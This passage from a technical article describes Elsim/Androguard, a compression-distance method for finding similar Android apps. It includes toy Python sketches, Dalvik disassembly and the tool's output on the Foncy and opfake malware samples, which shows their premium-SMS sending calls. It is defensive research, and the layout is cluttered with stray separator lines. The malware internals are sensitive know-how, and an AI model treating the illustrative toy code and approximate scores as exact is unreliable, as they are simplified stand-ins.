|------->|CLUSTERING|<-------|
|
|
|----------|
|
|
| | |
|
|
| | |->Cn
|
|
| |
|
|
| |->Cn-1
|
|
|
|
|
|
|
|
|
|
|
| __C1__
|
|
|->| X1 | |---|---------->|Kolmogorov|
|
|
| E1 |------>|NCD|
|
|
| .. | ^ |---|
|
|
| |
|
|
| |
|
|
| |
|
|
| |---------->|Threshold|
|
|
| |
|
|
| |
|
|
| |
|
|
| |
|
|
| / \
|
|
| / \
|
|
| / \
|
|
| F T
|
|
| / \
|
|
|----------------/ |
|
|
| |
|
|
| |--------|
|
|
| | BF |
|
|
| |--------|
|
|
| |
|
|
| |
|
|
| / \
|
|
| / \
|
|
| F T
|
|
|------------------------/ \
|
|
|
|
|
|-----|
|
|
| OK |
|
|
|-----|
|
|
|
|
Simple, no ? :)
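
Here is a toy sketch of this flow: a nearest-vector selection stands in for
the kmeans clustering, zlib for the compressor, the threshold is arbitrary,
and the Boolean formula is naively evaluated with eval(). This is not the
elsign implementation, just the idea.

###########################################
import zlib

def C(d): return len(zlib.compress(d, 9))
def ncd(x, y): return (C(x + y) - min(C(x), C(y))) / float(max(C(x), C(y)))
def dist(u, v): return sum((a - b) ** 2 for a, b in zip(u, v)) ** 0.5

def search(signature, elements, threshold=0.3):
    # signature = (name, formula, [(float_vector, string), ...])
    # elements  = [(float_vector, string), ...]
    name, formula, parts = signature
    env = {}
    for idx, (svec, sstr) in enumerate(parts):
        # "clustering" stand-in: only the 3 elements whose float vectors
        # are closest to this signature part are compared at all
        nearest = sorted(elements, key=lambda e: dist(e[0], svec))[:3]
        env[chr(ord('a') + idx)] = any(
            ncd(sstr.encode(), estr.encode()) <= threshold
            for _, estr in nearest)
    formula = formula.replace("&&", " and ").replace("||", " or ")
    return name if eval(formula, {}, env) else None
###########################################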
|
|
|
|
Here is an example (example_sign.py) which shows you how to load signatures
|
|
and elements, and check if a signature is present.
|
|
|
|
In the following example, we have two signatures composed of elements and a
|
|
set of "external" data to test. In the dataset, we have a corresponding
|
|
signature and a false positive:
|
|
|
|
###########################################
|
|
SIGNS = [
|
|
[ "Sign1", "a",
|
|
[ [ 4.4915299415588379, 4.9674844741821289,
|
|
4.9468302726745605, 0.0 ], "HELLO
|
|
WORLDDDDDDDDDDDDDDDDDDDDDDD" ] ],
|
|
[ "Sign2", "a && b",
|
|
[ [ 2.0, 3.0, 4.0, 5.0 ], "OOOPS !!!!!!!!" ],
|
|
[ [ 2.0, 3.0, 4.0, 8.0], "OOOOOOOOPPPPPS !!!" ] ],
|
|
]
|
|
ELEMS = [
|
|
[ [ 4.4915299415588379, 4.9674844741821289,
|
|
4.9468302726745605, 0.0 ], "HELLO WORLDDDDDDDDDDDDDDDDDDDDDDD"
|
|
],
|
|
[ [ 4.4915299415588379, 4.9674844741821289,
|
|
4.9468302726745605, 1.0 ], "FALSE POSITIVE" ],
|
|
[ [ 2.0, 3.0, 4.0, 5.0 ],
|
|
"HELLO WORLDDDDDDDDDDDDDDDDDDDDDDD" ],
|
|
[ [ 2.0, 3.0, 4.0, 5.0 ],
|
|
"HELLO WORLDDDDDDDDDDDDDDDDDDDDDDD" ],
|
|
[ [ 2.0, 3.0, 4.0, 5.0 ],
|
|
"HELLO WORLDDDDDDDDDDDDDDDDDDDDDDD" ],
|
|
[ [ 2.0, 3.0, 4.0, 5.0 ],
|
|
"HELLO WORLDDDDDDDDDDDDDDDDDDDDDDD" ],
|
|
]
|
|
###########################################
|
|
|
|
Each signature is composed of either one or several elements and a Boolean
|
|
formula ("a" is the first element, "b" is the second element, etc.).
|
|
|
|
By running the example, we can see that one signature is detected. It is
|
|
displayed along with several statistics (such as the number of clusters,
|
|
the number of comparisons (1) and the number of comparisons without (18)
|
|
this algorithm).
|
|
|
|
###########################################
|
|
d@t0t0:~/elsim/elsim/elsign$ ./example_sign.py
|
|
['Sign1', [0, 1, 0.1875]]
|
|
[SIGN:3 CLUSTERS:3 CMP_CLUSTERS:2 ELEMENTS:6 CMP_ELEMENTS:1
|
|
-> 18 5.555556%]
|
|
###########################################
|
|
|
|
If we remove the matching element, we can see that we can't detect a match
|
|
of the signature anymore, even if we have close entropies (fake values in
|
|
this case) with a signature (but the string is not the same):
|
|
|
|
###########################################
|
|
d@t0t0:~/elsim/elsim/elsign$ ./example_sign.py
|
|
[None]
|
|
[SIGN:3 CLUSTERS:2 CMP_CLUSTERS:2 ELEMENTS:5 CMP_ELEMENTS:3
|
|
-> 15 20.000000%]
|
|
###########################################
|
|
|
|
--[ 3 - Real World: Android
|
|
|
|
Now we can apply our algorithms to a real world problem domain. We have
|
|
chosen that of Android applications and malware identification. One of the
|
|
main problems with Android apps is plagiarism, because it is so easy to
modify and redistribute an application.
|
|
|
|
----[ 3.1 Similarities between two applications
|
|
|
|
To use our generic algorithm, we must first define what the "string" and
"hash" properties of an element are. So, what is an element in the case
|
|
of an Android application? We define it as a method or a class. The
|
|
"string" is the signature of a method and the "hash" is the sequence of
|
|
instructions.
|
|
|
|
Our signature is based on the grammar described by Silvio Cesare [2]. This
|
|
grammar is very simple:
|
|
|
|
#########################################################################
|
|
Procedure ::= StatementList
|
|
StatementList ::= Statement | Statement StatementList
|
|
Statement ::= BasicBlock | Return | Goto | If | Field | Package | String
|
|
Return ::= 'R'
|
|
Goto ::= 'G'
|
|
If ::= 'I'
|
|
BasicBlock ::= 'B'
|
|
Field ::= 'F'0 | 'F'1
|
|
Package ::= 'P' PackageNew | 'P' PackageCall
|
|
PackageNew ::= '0'
|
|
PackageCall ::= '1'
|
|
PackageName ::= Epsilon | Id
|
|
String ::= 'S' Number | 'S' Id
|
|
Number ::= \d+
|
|
Id ::= [a-zA-Z]\w+
|
|
#########################################################################
|
|
|
|
For example if we have the following code:
|
|
|
|
mov X, 4
|
|
mov Z, 5
|
|
add X, Z
|
|
goto +50
|
|
add X, Z
|
|
goto -100
|
|
|
|
Then the signature is:
|
|
|
|
B[G]B[G]
|
|
|
|
We do not take the individual instructions into account, but rather
information about the structure of the method.
|
|
|
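As a toy illustration, the translation of that small example into code
could look like this (assuming the instructions are already split into
basic blocks; the real implementation of course works on Dalvik bytecode):

#########################################################################
# toy Cesare-style signature for the example above
def block_signature(blocks):
    out = []
    for block in blocks:
        tags = []
        for ins in block:
            if ins.startswith("goto"):
                tags.append("G")
            elif ins.startswith("if"):
                tags.append("I")
            elif ins.startswith("return"):
                tags.append("R")
            # plain moves/arithmetic contribute nothing to the signature
        out.append("B[" + "".join(tags) + "]")
    return "".join(out)

blocks = [["mov X, 4", "mov Z, 5", "add X, Z", "goto +50"],
          ["add X, Z", "goto -100"]]
print(block_signature(blocks))   # B[G]B[G]
#########################################################################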
|
With an Android method, this gives a more complex signature:
|
|
|
|
Code:
|
|
[...]
|
|
call [ meth@ 22 Ljava/lang/String; valueOf
|
|
['(I)', 'Ljava/lang/String;'] ]
|
|
goto 50
|
|
|
|
Signature:
|
|
B[P1{Ljava/lang/String; valueOf (I)Ljava/lang/String;}G]
|
|
|
|
We only use the control flow graph (CFG) of the methods along with specific
instructions of the CFG such as "if*" or "goto". Instructions like
sparse/packed switch [4] are translated to plain "goto" instructions. We
can add information about the packages, and especially about the
Android/Java packages. Indeed, this is important information to include in
the signature (e.g. you must use the sendTextMessage API to send an SMS).
|
|
|
|
In the signature we can also record whether a method of a package is
called, whether an object is created, or whether a field is read or
written. Of course, it's possible to modify this kind of signature if you
want to take each instruction of the method into account. However, in our
case (and after experimental results) it seems useless, since we don't
depend on the "nature" of each instruction, but only on higher level
information.
|
|
|
|
We can extend this concept by using "predefined" signatures to help us:
|
|
|
|
- 0: information about packages (called/created) and fields, no
|
|
specific information about string
|
|
|
|
- 1: 0 + the size of strings,
|
|
|
|
- 2: 0 + filtering android packages names,
|
|
|
|
- 3: 0 + filtering Java packages names,
|
|
|
|
- 4: 0 + filtering Android/Java packages.
|
|
|
|
Having several types of signatures allows us to switch between them
dynamically, depending on whether the global structure of a method or the
Android packages it uses is more interesting to us.
|
|
|
|
For example, if we disassemble a particular method using Androguard [1] or
|
|
smali/baksmali [27], we obtain different signatures:
|
|
|
|
#########################################################################
|
|
d@t0t0:~/androguard$ ./androlyze.py -s
|
|
Androlyze version 1.0
|
|
In [1]: a, d, dx =
|
|
AnalyzeAPK("./examples/android/TestsAndroguard/bin/TestsAndroguard.apk")
|
|
In [5]: d.CLASS_Ltests_androguard_TestIfs.METHOD_testCFG.pretty_show()
|
|
METHOD access_flags=public (Ltests/androguard/TestIfs; testCFG,()V)
|
|
local registers: v0...v7
|
|
return:void
|
|
testCFG-BB@0x0 :
|
|
0(0) const/4 v0 , [ #+ 1 ] // {1}
|
|
1(2) const/4 v1 , [ #+ 1 ] // {1}
|
|
2(4) const/4 v2 , [ #+ 1 ] // {1}
|
|
3(6) const/4 v3 , [ #+ 1 ] // {1} [ testCFG-BB@0x8 ]
|
|
|
|
testCFG-BB@0x8 :
|
|
4(8) iget-boolean v4 , v7 , [ field@ 14 Ltests/androguard/TestIfs;
|
|
Z P ]
|
|
5(c) if-eqz v4 , [ + 77 ] [ testCFG-BB@0x10 testCFG-BB@0xa6 ]
|
|
|
|
testCFG-BB@0x10 :
|
|
6(10) move v1 , v0
|
|
7(12) iget-boolean v4 , v7 , [ field@ 15 Ltests/androguard/TestIfs;
|
|
Z Q ]
|
|
8(16) if-eqz v4 , [ + 70 ] [ testCFG-BB@0x1a testCFG-BB@0xa2 ]
|
|
|
|
testCFG-BB@0x1a :
|
|
9(1a) const/4 v3 , [ #+ 2 ] // {2} [ testCFG-BB@0x1c ]
|
|
|
|
testCFG-BB@0x1c :
|
|
10(1c) add-int/lit8 v2 , v2 , [ #+ 1 ] [ testCFG-BB@0x20 ]
|
|
|
|
testCFG-BB@0x20 :
|
|
11(20) sget-object v4 , [ field@ 0 Ljava/lang/System;
|
|
Ljava/io/PrintStream; out ]
|
|
12(24) new-instance v5 , [ type@ 25 Ljava/lang/StringBuilder; ]
|
|
13(28) invoke-static v0 , [ meth@ 22 Ljava/lang/String; valueOf
|
|
['(I)', 'Ljava/lang/String;'] ]
|
|
14(2e) move-result-object v6
|
|
15(30) invoke-direct v5 , v6 , [ meth@ 25 Ljava/lang/StringBuilder;
|
|
['(Ljava/lang/String;)', 'V'] ]
|
|
16(36) const-string v6 , [ string@ 5 ',' ]
|
|
17(3a) invoke-virtual v5 , v6 , [ meth@ 31
|
|
Ljava/lang/StringBuilder; append ['(Ljava/lang/String;)',
|
|
'Ljava/lang/StringBuilder;'] ]
|
|
18(40) move-result-object v5
|
|
19(42) invoke-virtual v5 , v1 , [ meth@ 28
|
|
Ljava/lang/StringBuilder; append ['(I)',
|
|
'Ljava/lang/StringBuilder;'] ]
|
|
20(48) move-result-object v5
|
|
21(4a) const-string v6 , [ string@ 5 ',' ]
|
|
22(4e) invoke-virtual v5 , v6 , [ meth@ 31
|
|
Ljava/lang/StringBuilder; append ['(Ljava/lang/String;)',
|
|
'Ljava/lang/StringBuilder;'] ]
|
|
23(54) move-result-object v5
|
|
24(56) invoke-virtual v5 , v2 , [ meth@ 28
|
|
Ljava/lang/StringBuilder; append ['(I)',
|
|
'Ljava/lang/StringBuilder;'] ]
|
|
25(5c) move-result-object v5
|
|
26(5e) const-string v6 , [ string@ 5 ',' ]
|
|
27(62) invoke-virtual v5 , v6 , [ meth@ 31
|
|
Ljava/lang/StringBuilder; append ['(Ljava/lang/String;)',
|
|
'Ljava/lang/StringBuilder;'] ]
|
|
28(68) move-result-object v5
|
|
29(6a) invoke-virtual v5 , v3 , [ meth@ 28
|
|
Ljava/lang/StringBuilder; append ['(I)',
|
|
'Ljava/lang/StringBuilder;'] ]
|
|
30(70) move-result-object v5
|
|
31(72) invoke-virtual v5 , [ meth@ 32 Ljava/lang/StringBuilder;
|
|
toString ['()', 'Ljava/lang/String;'] ]
|
|
32(78) move-result-object v5
|
|
33(7a) invoke-virtual v4 , v5 , [ meth@ 8 Ljava/io/PrintStream;
|
|
println ['(Ljava/lang/String;)', 'V'] ] [ testCFG-BB@0x80 ]
|
|
|
|
testCFG-BB@0x80 :
|
|
34(80) iget-boolean v4 , v7 , [ field@ 16
|
|
Ltests/androguard/TestIfs; Z R ]
|
|
35(84) if-eqz v4 , [ + 4 ] [ testCFG-BB@0x88 testCFG-BB@0x8c ]
|
|
|
|
testCFG-BB@0x88 :
|
|
36(88) add-int/lit8 v3 , v3 , [ #+ 4 ] [ testCFG-BB@0x8c ]
|
|
|
|
testCFG-BB@0x8c :
|
|
37(8c) iget-boolean v4 , v7 , [ field@ 17
|
|
Ltests/androguard/TestIfs; Z S ]
|
|
38(90) if-eqz v4 , [ + -8 ] [ testCFG-BB@0x94 testCFG-BB@0x80 ]
|
|
|
|
testCFG-BB@0x94 :
|
|
39(94) add-int/lit8 v0 , v0 , [ #+ 6 ]
|
|
40(98) iget-boolean v4 , v7 , [ field@ 18
|
|
Ltests/androguard/TestIfs; Z T ]
|
|
41(9c) if-eqz v4 , [ + -74 ] [ testCFG-BB@0xa0 testCFG-BB@0x8 ]
|
|
|
|
testCFG-BB@0xa0 :
|
|
42(a0) return-void
|
|
|
|
testCFG-BB@0xa2 :
|
|
43(a2) const/4 v3 , [ #+ 3 ] // {3}
|
|
44(a4) goto [ + -68 ] [ testCFG-BB@0x1c ]
|
|
|
|
testCFG-BB@0xa6 :
|
|
45(a6) add-int/lit8 v2 , v2 , [ #+ 2 ]
|
|
46(aa) goto [ + -69 ] [ testCFG-BB@0x20 ]
|
|
#########################################################################
|
|
|
|
By using the first kind of predefined signature, we can see each basic
|
|
block with some information. By filtering Java packages we have more
|
|
information about the behavior of the method:
|
|
|
|
#########################################################################
|
|
In [6]: dx.get_method_signature(d.CLASS_Ltests_androguard_TestIfs.
|
|
METHOD_testCFG, predef_sign = analysis.SIGNATURE_L0_0).get_string()
|
|
Out[6]: 'B[]B[I]B[I]B[]B[]B[P0P1P1P1P1P1P1P1P1P1P1]B[I]B[]B[I]B[I]B[R]
|
|
B[G]B[G]'
|
|
In [9]: dx.get_method_signature(d.CLASS_Ltests_androguard_TestIfs.
|
|
METHOD_testCFG, predef_sign = analysis.SIGNATURE_L0_3).get_string()
|
|
Out[9]: 'B[]B[I]B[I]B[]B[]B[P0{Ljava/lang/StringBuilder;}P1
|
|
{Ljava/lang/String;valueOf(I)Ljava/lang/String;}
|
|
P1{Ljava/lang/StringBuilder;(Ljava/lang/String;)V}
|
|
P1{Ljava/lang/StringBuilder;append(Ljava/lang/String;)
|
|
Ljava/lang/StringBuilder;}
|
|
P1{Ljava/lang/StringBuilder;append(I)Ljava/lang/StringBuilder;}
|
|
P1{Ljava/lang/StringBuilder;append(Ljava/lang/String;)
|
|
Ljava/lang/StringBuilder;}
|
|
P1{Ljava/lang/StringBuilder;append(I)Ljava/lang/StringBuilder;}
|
|
P1{Ljava/lang/StringBuilder;append(Ljava/lang/String;)
|
|
Ljava/lang/StringBuilder;}
|
|
P1{Ljava/lang/StringBuilder;append(I)Ljava/lang/StringBuilder;}
|
|
P1{Ljava/lang/StringBuilder;toString()Ljava/lang/String;}
|
|
P1{Ljava/io/PrintStream;println(Ljava/lang/String;)V}]
|
|
B[I]B[]B[I]B[I]B[R]B[G]B[G]'
|
|
#########################################################################
|
|
|
|
Here SIGNATURE_L0_0 corresponds to the predefined signature 0 and
SIGNATURE_L0_3 to the predefined signature 3.
|
|
|
|
We can test our signature with a real malware like Foncy [5]:
|
|
|
|
#########################################################################
|
|
In [15]: a, d, dx =
|
|
AnalyzeAPK("./apks/malwares/foncy/6be2988a916cb620c71ff3d8d4dac5db2881c6\
|
|
75dd34a4bb7b238b5899b48600")
|
|
#########################################################################
|
|
|
|
In this case, we are more interested in signatures embedding Android
|
|
packages, Java packages or both:
|
|
|
|
#########################################################################
|
|
In [16]: dx.get_method_signature(d.CLASS_Lorg_eapp_MagicSMSActivity.
|
|
METHOD_onCreate, predef_sign = analysis.SIGNATURE_L0_2).get_string()
|
|
Out[16]: 'B[P1{Landroid/app/Activity;onCreate(Landroid/os/Bundle;)V}P0
|
|
P1{Landroid/os/Environment;getExternalStorageDirectory()Ljava/io/File;}P1
|
|
P1P1P1P1P0P0P1P1P1P1P1P1I]B[R]B[P1]
|
|
B[P1{Landroid/telephony/SmsManager;getDefault()
|
|
Landroid/telephony/SmsManager;}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}
|
|
P1{Landroid/telephony/SmsManager;sendTextMessage(Ljava/lang/String;
|
|
Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent;
|
|
Landroid/app/PendingIntent;)V}P2
|
|
P1{Landroid/widget/Toast;makeText(Landroid/content/Context;
|
|
Ljava/lang/CharSequence; I)Landroid/widget/Toast;}
|
|
P1{Landroid/widget/Toast;show()V}G]B[G]'
|
|
|
|
In [17]: dx.get_method_signature(d.CLASS_Lorg_eapp_MagicSMSActivity.
|
|
METHOD_onCreate, predef_sign = analysis.SIGNATURE_L0_3).get_string()
|
|
Out[17]: 'B[P1P0{Ljava/lang/StringBuilder;}P1
|
|
P1{Ljava/io/File;getAbsolutePath()Ljava/lang/String;}
|
|
P1{Ljava/lang/String;valueOf(Ljava/lang/Object;)Ljava/lang/String;}
|
|
P1{Ljava/lang/StringBuilder;(Ljava/lang/String;)V}
|
|
P1{Ljava/lang/StringBuilder;append(Ljava/lang/String;)
|
|
Ljava/lang/StringBuilder;}
|
|
P1{Ljava/lang/StringBuilder;toString()Ljava/lang/String;}
|
|
P0{Ljava/io/File;}
|
|
P0{Ljava/lang/StringBuilder;}
|
|
P1{Ljava/lang/String;valueOf(Ljava/lang/Object;)Ljava/lang/String;}
|
|
P1{Ljava/lang/StringBuilder;(Ljava/lang/String;)V}
|
|
P1{Ljava/lang/StringBuilder;append(Ljava/lang/String;)
|
|
Ljava/lang/StringBuilder;}
|
|
P1{Ljava/lang/StringBuilder;toString()Ljava/lang/String;}
|
|
P1{Ljava/io/File;(Ljava/lang/String;)V}
|
|
P1{Ljava/io/File;exists()Z}I]B[R]
|
|
B[P1{Ljava/io/File;createNewFile()Z}]
|
|
B[P1P1P1P1P1P1P1P1P1P1P1P1P1P1P1P1P1P1P1P1P1P2P1P1G]B[G]'
|
|
|
|
In [18]: dx.get_method_signature(d.CLASS_Lorg_eapp_MagicSMSActivity.
|
|
METHOD_onCreate, predef_sign = analysis.SIGNATURE_L0_4).get_string()
|
|
Out[18]: 'B[P1{Landroid/app/Activity;onCreate(Landroid/os/Bundle;)V}
|
|
P0{Ljava/lang/StringBuilder;}
|
|
P1{Landroid/os/Environment;getExternalStorageDirectory()Ljava/io/File;}
|
|
P1{Ljava/io/File;getAbsolutePath()Ljava/lang/String;}
|
|
P1{Ljava/lang/String;valueOf(Ljava/lang/Object;)Ljava/lang/String;}
|
|
P1{Ljava/lang/StringBuilder;(Ljava/lang/String;)V}
|
|
P1{Ljava/lang/StringBuilder;append(Ljava/lang/String;)
|
|
[...]
|
|
Landroid/app/PendingIntent;)V}
|
|
[...]
|
|
B[G]'
|
|
#########################################################################
|
|
|
|
It's interesting to see that even if the basic blocks are in a different
order, the Kolmogorov complexity is preserved and we observe a strong
similarity (the TestReorg function). If we reorder the basic blocks in the
signature, the results stay roughly the same, so the NCD essentially
bypasses basic CFG obfuscation:
|
|
|
|
#########################################################################
|
|
d@t0t0:~/elsim$ ./tests/test_similarity.py
|
|
* LZMA
|
|
(0.031779661774635315, 0)
|
|
(0.031779661774635315, 0)
|
|
(0.04237288236618042, 0)
|
|
(0.040169134736061096, 0)
|
|
(0.03983228653669357, 0)
|
|
(0.03991596773266792, 0)
|
|
(0.042016807943582535, 0)
|
|
(0.039256200194358826, 0)
|
|
(0.04356846585869789, 0)
|
|
(0.03933747485280037, 0)
|
|
(0.03719008341431618, 0)
|
|
(0.043478261679410934, 0)
|
|
(0.043478261679410934, 0)
|
|
(0.04025423899292946, 0)
|
|
(0.04411764815449715, 0)
|
|
(0.041580040007829666, 0)
|
|
(0.04149377718567848, 0)
|
|
(0.03563941270112991, 0)
|
|
(0.03966597095131874, 0)
|
|
(0.03563941270112991, 0)
|
|
(0.04184100404381752, 0)
|
|
(0.04393305256962776, 0)
|
|
(0.03974895551800728, 0)
|
|
(0.03983228653669357, 0)
|
|
(0.041753653436899185, 0)
|
|
[....]
|
|
#########################################################################
|
|
|
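The figures above come from tests/test_similarity.py. For reference, a
minimal NCD computation of the same flavor is shown below, using the
standard lzma module purely for illustration (Elsim supports several
compressors, so the exact values will differ):

#########################################################################
# NCD(x, y) = (C(xy) - min(C(x), C(y))) / max(C(x), C(y))
import lzma

def C(data):
    return len(lzma.compress(data))

def ncd(x, y):
    cx, cy = C(x), C(y)
    return float(C(x + y) - min(cx, cy)) / max(cx, cy)

sig1 = b"B[G]B[I]B[P1G]B[R]"
sig2 = b"B[I]B[G]B[R]B[P1G]"    # same blocks, different order
print(ncd(sig1, sig2))          # small value -> very similar
#########################################################################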
|
The "hash" is the sequence of instructions in each method, and for each
|
|
instruction we remove the information depending on the compilation
|
|
(registers, etc.).
|
|
|
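As an illustration of that normalization (hypothetical helper, the real
cleaning is done inside Elsim), registers and raw offsets are dropped while
the operation and what it references are kept:

#########################################################################
# keep the opcode and the referenced class/method, drop the registers
def normalize(ins):
    tokens = ins.split()
    refs = [t for t in tokens if t.startswith("L")]
    return tokens[0] + ((" " + refs[0]) if refs else "")

print(normalize("invoke-virtual v5 , v6 , Ljava/lang/StringBuilder;->append"))
# invoke-virtual Ljava/lang/StringBuilder;->append
#########################################################################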
|
Having defined the "string" and the "hash" properties in the specific
|
|
context of Android Apps, we can now test the algorithm on various samples.
|
|
We use a tool called "androsim.py" which is a simple script based on
|
|
"Elsim".
|
|
|
|
This tool detects and reports:
|
|
|
|
- the identical methods;
|
|
- the similar methods;
|
|
- the deleted methods;
|
|
- the new methods;
|
|
- the skipped methods.
|
|
|
|
Moreover, a similarity score (between 0.0 and 100.0) is calculated from
the values of the identical methods (1.0) and the similar methods (in this
particular case, we compute the final values with the BZ2 compressor
because its return value is more "interesting" for the score: it gives an
understandable value directly related to the similarity).
|
|
|
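One plausible way to aggregate these values, purely illustrative and not
necessarily the exact weighting used by androsim.py, is:

#########################################################################
# illustrative score: identical methods count as 1.0, similar methods as
# (1 - distance); the real androsim weighting may differ
def similarity_score(n_identical, similar_distances, n_total):
    value = n_identical + sum(1.0 - d for d in similar_distances)
    return 100.0 * value / n_total

# opfake example below: 34 identical and 5 similar methods
dists = [0.09, 0.125, 0.18, 0.07, 0.32]
print(similarity_score(34, dists, 39))   # ~98, same ballpark as reported
#########################################################################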
|
For the first test we use the "opfake" malware [6]. If we take two samples
from the same family, a high similarity score is revealed:
|
|
|
#########################################################################
|
|
d@t0t0:~/androguard$ ./androsim.py -i
|
|
apks/malwares/opfake/\
|
|
b79106465173490e07512aa6a182b5da558ad2d4f6fae038101796b534628311
|
|
apks/malwares/opfake/\
|
|
b906279e8c79a12e5a10feafe5db850024dd75e955e9c2f9f82bbca10e0585a6
|
|
|
|
Elements:
|
|
IDENTICAL: 34
|
|
SIMILAR: 5
|
|
NEW: 0
|
|
DELETED: 0
|
|
SKIPPED: 0
|
|
--> methods: 99.100500% of similarities
|
|
#########################################################################
|
|
|
|
These two samples have similar methods and it's possible to have more
|
|
information by specifying the "-d" option:
|
|
|
|
#########################################################################
|
|
SIMILAR methods:
|
|
Lcom/reg/MainRegActivity; displayFakeProgress ()V 61
|
|
--> Lcom/reg/MainRegActivity; displayFakeProgress ()V
|
|
61 0.0909090936184
|
|
Lcom/reg/MainRegActivity; getNextButton ()Landroid/widget/Button;
|
|
40
|
|
--> Lcom/reg/MainRegActivity; getNextButton
|
|
()Landroid/widget/Button; 40 0.125
|
|
Lcom/reg/MainRegActivity; showLinkForm ()V 111
|
|
--> Lcom/reg/MainRegActivity; showLinkForm ()V
|
|
111 0.183673471212
|
|
Lcom/reg/MainRegActivity; showRules ()V 132
|
|
--> Lcom/reg/MainRegActivity; showRules ()V
|
|
132 0.0731707289815
|
|
Lcom/reg/MainRegActivity; setMainScreen ()V 147
|
|
--> Lcom/reg/MainRegActivity; setMainScreen ()V
|
|
147 0.319148927927
|
|
IDENTICAL methods:
|
|
Lcom/reg/MainRegActivity; PushMsg (Ljava/lang/String;
|
|
Ljava/lang/String;)V 76
|
|
--> Lcom/reg/MainRegActivity; PushMsg (Ljava/lang/String;
|
|
Ljava/lang/String;)V 76
|
|
|
|
Lcom/reg/SmsReceiver; setListener (Lcom/reg/SMSAction;)V 3
|
|
--> Lcom/reg/SmsReceiver; setListener
|
|
(Lcom/reg/SMSAction;)V 3
|
|
|
|
Lcom/reg/MainRegActivity; loadString (I)Ljava/lang/String; 52
|
|
--> Lcom/reg/MainRegActivity; loadString (I)
|
|
Ljava/lang/String; 52
|
|
|
|
Lcom/reg/MainRegActivity; access$600 ()Ljava/lang/String; 3
|
|
--> Lcom/reg/MainRegActivity; access$600
|
|
()Ljava/lang/String; 3
|
|
|
|
Lcom/reg/ParseXml; getXMLTags (Ljava/lang/String;
|
|
Ljava/lang/String;)Ljava/util/Vector; 82
|
|
--> Lcom/reg/ParseXml; getXMLTags (Ljava/lang/String;
|
|
Ljava/lang/String;)Ljava/util/Vector; 82
|
|
|
|
Lcom/reg/ParseXml; getXMLExtra (Ljava/lang/String;
|
|
Ljava/lang/String;)Ljava/lang/String; 52
|
|
--> Lcom/reg/ParseXml; getXMLExtra (Ljava/lang/String;
|
|
Ljava/lang/String;)Ljava/lang/String; 52
|
|
|
|
Lcom/reg/MainRegActivity; SaveSuccess ()V 23
|
|
--> Lcom/reg/MainRegActivity; SaveSuccess ()V 23
|
|
|
|
Lcom/reg/SmsReceiver; onReceive (Landroid/content/Context;
|
|
Landroid/content/Intent;)V 59
|
|
--> Lcom/reg/SmsReceiver; onReceive
|
|
(Landroid/content/Context; Landroid/content/Intent;)V 59
|
|
|
|
Lcom/reg/ParseXml; getXMLIntElement (Ljava/lang/String;
|
|
Ljava/lang/String;)I 55
|
|
